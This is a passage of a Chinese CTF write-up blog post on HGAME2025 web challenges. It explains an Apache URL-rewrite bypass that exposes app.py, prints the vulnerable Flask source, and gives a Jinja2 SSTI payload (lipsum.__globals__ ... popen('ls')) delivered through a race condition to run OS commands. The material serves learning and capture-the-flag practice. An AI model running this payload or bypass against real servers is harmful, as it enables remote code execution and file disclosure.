<li><code>express.static</code> 是 Express 提供的一个内置中间件，用于为应用提供静态文件服务。它可以为指定的目录提供静态资源</li>
<li><code>path.join</code> 是 Node.js 内置的 <code>path</code> 模块的方法，用于安全地连接文件和目录路径。</li>
<li><code>__dirname</code> 是一个全局变量，表示当前执行脚本所在的目录的绝对路径。</li>
</ul>
<p>先放着吧，这个知识点还没学，学完了再回来写</p>
<h1 id="Level-38475-角落"><a href="#Level-38475-角落" class="headerlink" title="Level 38475 角落"></a><strong>Level 38475 角落</strong></h1><h2 id="url重写漏洞-ssti条件竞争"><a href="#url重写漏洞-ssti条件竞争" class="headerlink" title="#url重写漏洞+ssti条件竞争"></a>#url重写漏洞+ssti条件竞争</h2><p>题目提示会有管理员查看留言</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222115011381.png" alt="image-20250222115011381"></p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222115238416.png" alt="image-20250222115238416"></p>
<p>传了一个<code>&lt;script&gt;alert(&quot;1&quot;)&lt;/script&gt;</code>显示上传成功但是没得弹窗警告，扫目录看到一个有robots.txt，给了一个&#x2F;app.conf</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Include by httpd.conf</span></span><br><span class="line"><span class="section">&lt;Directory <span class="string">&quot;/usr/local/apache2/app&quot;</span>&gt;</span></span><br><span class="line">	<span class="attribute">Options</span> Indexes</span><br><span class="line">	<span class="attribute">AllowOverride</span> None</span><br><span class="line">	<span class="attribute">Require</span> <span class="literal">all</span> granted</span><br><span class="line"><span class="section">&lt;/Directory&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="section">&lt;Files <span class="string">&quot;/usr/local/apache2/app/app.py&quot;</span>&gt;</span></span><br><span class="line">    <span class="attribute">Order</span> <span class="literal">Allow</span>,<span class="literal">Deny</span></span><br><span class="line">    <span class="attribute">Deny</span> from <span class="literal">all</span></span><br><span class="line"><span class="section">&lt;/Files&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="attribute">RewriteEngine</span> <span class="literal">On</span></span><br><span class="line"><span class="attribute">RewriteCond</span> <span class="string">&quot;%&#123;HTTP_USER_AGENT&#125;&quot;</span> <span class="string">&quot;^L1nk/&quot;</span></span><br><span class="line"><span class="attribute">RewriteRule</span> <span class="string">&quot;^/admin/(.*)$&quot;</span> <span class="string">&quot;/$1.html?secret=todo&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="attribute">ProxyPass</span> <span class="string">&quot;/app/&quot;</span> <span class="string">&quot;http://127.0.0.1:5000/&quot;</span></span><br></pre></td></tr></table></figure>

<p>分析一下这个配置文件，app.py不让访问，我们重点看一下URL重写规则</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">RewriteEngine On//开启 Apache 的 URL 重写模块</span><br><span class="line">RewriteCond &quot;%&#123;HTTP_USER_AGENT&#125;&quot; &quot;^L1nk/&quot;%&#123;HTTP_USER_AGENT&#125;表示客户端发送的 HTTP 请求中的用户代理字符串（User-Agent），如果UA头中包含 L1nk/ 字符串，则后续的重写规则将会被应用</span><br><span class="line">RewriteRule &quot;^/admin/(.*)$&quot; &quot;/$1.html?secret=todo&quot;</span><br></pre></td></tr></table></figure>

<ul>
<li>RewriteRule “^&#x2F;admin&#x2F;(.*)$” “&#x2F;$1.html?secret&#x3D;todo”</li>
</ul>
<p>什么意思呢?就是当我访问&#x2F;admin&#x2F;???目录的时候Apache 会尝试在文件系统中查找 <code>/???.html</code> 文件</p>
<p>阿帕奇的URL重写规则</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222121757897.png" alt="image-20250222121757897"></p>
<p>试着去拿一下app.py但是没拿到，应该是路径问题</p>
<p>后面找文档看到有版本CVE</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222123722368.png" alt="image-20250222123722368"></p>
<p>Apache 的文档根目录（<code>DocumentRoot</code>）通常是 <code>/usr/local/apache</code> 或类似路径。直接读app.py</p>
<p><img src="/../image/achieve/202411/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020/image-20250222123531139.png" alt="image-20250222123531139"></p>
<p>只需要在最后加一个%3f即可，这会把app.py后面的东西变成查询语句。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">//app.py</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, render_template_string, redirect</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> templates</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">pwd = os.path.dirname(__file__)</span><br><span class="line">show_msg = templates.show_msg</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">readmsg</span>():</span><br><span class="line">	filename = pwd + <span class="string">&quot;/tmp/message.txt&quot;</span></span><br><span class="line">	<span class="keyword">if</span> os.path.exists(filename):</span><br><span class="line">		f = <span class="built_in">open</span>(filename, <span class="string">&#x27;r&#x27;</span>)</span><br><span class="line">		message = f.read()</span><br><span class="line">		f.close()</span><br><span class="line">		<span class="keyword">return</span> message</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">return</span> <span class="string">&#x27;No message now.&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/index&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">	status = request.args.get(<span class="string">&#x27;status&#x27;</span>)</span><br><span class="line">	<span class="keyword">if</span> status <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">		status = <span class="string">&#x27;&#x27;</span></span><br><span class="line">	<span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>, status=status)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/send&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">write_message</span>():</span><br><span class="line">	filename = pwd + <span class="string">&quot;/tmp/message.txt&quot;</span></span><br><span class="line">	message = request.form[<span class="string">&#x27;message&#x27;</span>]</span><br><span class="line"></span><br><span class="line">	f = <span class="built_in">open</span>(filename, <span class="string">&#x27;w&#x27;</span>)</span><br><span class="line">	f.write(message) </span><br><span class="line">	f.close()</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> redirect(<span class="string">&#x27;index?status=Send successfully!!&#x27;</span>)</span><br><span class="line">	</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/read&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read_message</span>():</span><br><span class="line">	<span class="keyword">if</span> <span class="string">&quot;&#123;&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> readmsg():</span><br><span class="line">		show = show_msg.replace(<span class="string">&quot;&#123;&#123;message&#125;&#125;&quot;</span>, readmsg())</span><br><span class="line">		<span class="keyword">return</span> render_template_string(show)</span><br><span class="line">	<span class="keyword">return</span> <span class="string">&#x27;waf!!&#x27;</span></span><br><span class="line">	</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">	app.run(host = <span class="string">&#x27;0.0.0.0&#x27;</span>, port = <span class="number">5000</span>)</span><br></pre></td></tr></table></figure>

<p>路由&#x2F;read是用来渲染的，是ssti，先传一个7*7然后访问&#x2F;read路由</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222125751104.png" alt="image-20250222125751104"></p>
<p>能正常访问处理，因为这里会检查是否包含<code>&#123;</code>，之前没学过过滤了这个怎么做，后面看的师傅的wp知道这里是需要条件竞争的，因为我们需要写文件读文件，那么这里可以可以用条件竞争来做。</p>
<p>需要一个正常&#x2F;send包，一个写文件的&#x2F;send包，一个读文件的&#x2F;read包</p>
<p>我们用lipsum获取os模块，三个包设置如下</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222131347646.png" alt="image-20250222131347646"></p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222131409577.png" alt="image-20250222131409577"></p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222131429676.png" alt="image-20250222131429676"></p>
<p>payload</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="language-xml">message=</span><span class="template-variable">&#123;&#123;<span class="name">lipsum.__globals__.__builtins__.__import__</span>(<span class="name">&#x27;os&#x27;</span>).popen(<span class="name">&#x27;ls&#x27;</span>).read()&#125;&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="/../image/achieve/202411/hgame2025/image-20250222131319867.png" alt="image-20250222131319867"></p>
<p>然后换一下rce命令再竞争一下就可以了</p>
<p><img src="/../image/achieve/202411/hgame2025/image-20250222131700129.png" alt="image-20250222131700129"></p>
<h1 id="Level-25-双面人派对"><a href="#Level-25-双面人派对" class="headerlink" title="Level 25 双面人派对"></a>Level 25 双面人派对</h1><p>还需要逆向分析，压根不会，可以看看infernity师傅的wp</p>
<p><a target="_blank" rel="noopener" href="https://infernity.top/2025/02/03/Hgame-2025-week1/#Level-25-%E5%8F%8C%E9%9D%A2%E4%BA%BA%E6%B4%BE%E5%AF%B9">Hgame2025 week1 Web WP</a></p>
<h1 id="Level-21096-HoneyPot"><a href="#Level-21096-HoneyPot" class="headerlink" title="Level 21096 HoneyPot"></a><strong>Level 21096 HoneyPot</strong></h1>
    </div>

    
    
    
	
	<div>
	  
		
<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>

	  
	</div>


    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>wanTh3flag
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://wanth3f1ag.top/2025/02/22/HGAME2025/" title="HGAME2025">https://wanth3f1ag.top/2025/02/22/HGAME2025/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/HGAME2025/" rel="tag"># HGAME2025</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/02/20/c%E8%AF%AD%E8%A8%80%E5%A4%8D%E4%B9%A0%E7%BA%AA%E5%BD%95/" rel="prev" title="c语言复习纪录">
                  <i class="fa fa-angle-left"></i> c语言复习纪录
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/03/05/ctfshow%E6%91%86%E7%83%82%E6%9D%AF(%E5%B7%B2%E5%81%9A%E5%AE%8C)/" rel="next" title="ctfshow摆烂杯(已做完)">
                  ctfshow摆烂杯(已做完) <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2024 – 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">wanTh3flag</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">3.2m</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">49:01</span>
  </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
